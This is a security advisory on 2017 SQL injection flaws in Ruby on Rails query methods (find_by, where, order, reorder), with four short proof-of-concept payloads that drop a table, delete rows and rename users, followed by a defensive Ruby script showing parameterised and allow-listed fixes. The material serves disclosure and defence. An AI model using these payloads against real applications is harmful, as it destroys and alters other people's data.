Kay

security researcher @MalwareBenchmark.

Ruby on Rails Arbitrary SQL Injection

Framework: Ruby on Rails

Affected Version: <= 5.1.4

Published: December 27th, 2017

Reported by: Kay

Overview

Ruby on Rails is a web application framework written in Ruby. Several issues were found in the Active Record Query Interface that can lead to arbitrary SQL injection. When a Rails application's MySQL connection is configured with flags: [MULTI_STATEMENTS] in database.yml, additional SQL statements can be injected through query methods such as find_by, where, order and reorder.

When these query methods are given a string argument, the string is placed into the generated SQL verbatim, so a semicolon inside it terminates the intended statement and whatever follows is sent to the server as a further statement.

These issues are confirmed to affect applications built on MySQL. Worse, it was verified that when a Rails application runs on Alibaba Cloud RDS for MySQL the attack also succeeds without flags: [MULTI_STATEMENTS] being set in the Rails application.

In summary, exploitation is possible when both of the following conditions hold:

  1. The Rails application is built on Alibaba Cloud RDS for MySQL, or its database.yml sets flags: [MULTI_STATEMENTS]

  2. Attacker-controlled string parameters are passed to query methods such as find_by, where, order, etc.

PoC

CVE-2017-17916 SQL injection in find_by method

# Find the User record whose name is Amy; the second statement drops the users table.
# The leading ")" closes the parenthesis Active Record wraps around the condition,
# and the trailing "(" balances the one it appends after the injected text.
User.find_by("name = 'Amy'); DROP TABLE `users`;(")


CVE-2017-17917 SQL injection in where method

# Find the User records whose id is 1; the second statement deletes them
User.where("id = 1); DELETE FROM `users` WHERE `users`.`id` = 1;(")


CVE-2017-17919 SQL injection in order method

# Order users by id descending; the second statement renames the user with id 2 to kay
User.order("id desc; UPDATE `users` SET `name` = 'kay' WHERE `users`.`id` = 2")


CVE-2017-17920 SQL injection in reorder method

# Order users by id descending; the second statement renames the user with id 1 to malwarebenchmark
User.reorder("id desc; UPDATE `users` SET `name` = 'malwarebenchmark' WHERE `users`.`id` = 1")

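The following is an added example, not code from the advisory or from Rails. It models the SQL text that Active Record builds when find_by, where and order receive a raw string (the PoC payloads above), splits that text into the statements a server with CLIENT_MULTI_STATEMENTS would execute, and contrasts it with the parameterised and allow-listed forms that keep attacker input as a value rather than SQL syntax. Nothing here connects to a database; the helper names (find_by_sql, split_statements, quote, sanitize_sql_array, safe_order) and the ORDERABLE allow-list are assumptions for illustration, and the quoting is an approximation of the mysql2 adapter's escaping. Note that the MULTI_STATEMENTS flag only governs whether the extra statements run; a raw string argument is still injectable without it through UNION, subqueries or boolean conditions, so the hardened forms are the fix regardless of the flag.

```ruby
# Added example (not the advisory's code): model the SQL text Active Record builds
# for raw-string arguments, count the statements it contains, and show the safe forms.
# Quoting below approximates the mysql2 adapter (backslash before ' and \); it is
# not the adapter's real quote method.

# --- How each method places a raw string into the statement (mirrors the PoC SQL) ---

def find_by_sql(raw)
  "SELECT `users`.* FROM `users` WHERE (#{raw}) LIMIT 1"
end

def where_sql(raw)
  "SELECT `users`.* FROM `users` WHERE (#{raw})"
end

def order_sql(raw)
  "SELECT `users`.* FROM `users` ORDER BY #{raw}"
end

# --- Split SQL text into top-level statements, ignoring ';' inside quoted text ---
# This is the split a MySQL server performs when the client connected with
# CLIENT_MULTI_STATEMENTS (flags: [MULTI_STATEMENTS] in database.yml); without the
# flag the server rejects the whole text with a syntax error instead.
def split_statements(sql)
  stmts = []
  cur = +""
  quote = nil       # currently open quote character (' " or `), or nil
  escaped = false   # previous char was a backslash inside a quoted string
  sql.each_char do |c|
    if quote
      cur << c
      if escaped
        escaped = false
      elsif c == "\\"
        escaped = true
      elsif c == quote
        quote = nil
      end
    elsif c == "'" || c == '"' || c == "`"
      quote = c
      cur << c
    elsif c == ";"
      stmts << cur.strip unless cur.strip.empty?
      cur = +""
    else
      cur << c
    end
  end
  stmts << cur.strip unless cur.strip.empty?
  stmts
end

# --- Hardened forms ---

# Quote a Ruby value as a MySQL literal (approximation of the adapter's quoting).
def quote(value)
  case value
  when Integer then value.to_s
  when nil     then "NULL"
  else "'" + value.to_s.gsub(/[\\']/) { |m| "\\" + m } + "'"
  end
end

# Equivalent of where("name = ?", value): each ? is replaced by a quoted literal,
# so attacker text can only ever be a value, never SQL syntax.
def sanitize_sql_array(template, *values)
  pending = values.dup
  raise ArgumentError, "placeholder/value count mismatch" unless template.count("?") == pending.size
  template.gsub("?") { quote(pending.shift) }
end

# Equivalent of find_by(name: value): the column comes from code, the value is quoted.
def find_by_hash_sql(column, value)
  find_by_sql("`users`.`#{column}` = #{quote(value)}")
end

# order() takes no bind parameters, so the only safe user-controlled input is an
# allow-list key (hypothetical allow-list for the users table).
ORDERABLE = { "id" => "`users`.`id`", "name" => "`users`.`name`" }.freeze

def safe_order(column, direction)
  col = ORDERABLE.fetch(column) { raise ArgumentError, "unknown order column: #{column}" }
  dir = direction.to_s.downcase
  raise ArgumentError, "bad direction: #{direction}" unless %w[asc desc].include?(dir)
  "#{col} #{dir.upcase}"
end

if __FILE__ == $0
  payload = "name = 'Amy'); DROP TABLE `users`;("   # the CVE-2017-17916 PoC string
  puts split_statements(find_by_sql(payload)).size                                  # 3 statements
  puts split_statements(find_by_sql(sanitize_sql_array("name = ?", payload))).size  # 1 statement
  puts split_statements(find_by_hash_sql("name", payload)).size                     # 1 statement
  puts order_sql(safe_order("id", "desc"))
end
```

Running the script shows the raw payload producing three statements (the intended SELECT, the DROP TABLE, and a leftover fragment), while the same text passed through a ? placeholder or a hash condition stays a single statement with the payload embedded as a quoted literal. For order and reorder there is no placeholder form, which is why an allow-list that rejects anything but a known column and direction is the practical defence.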
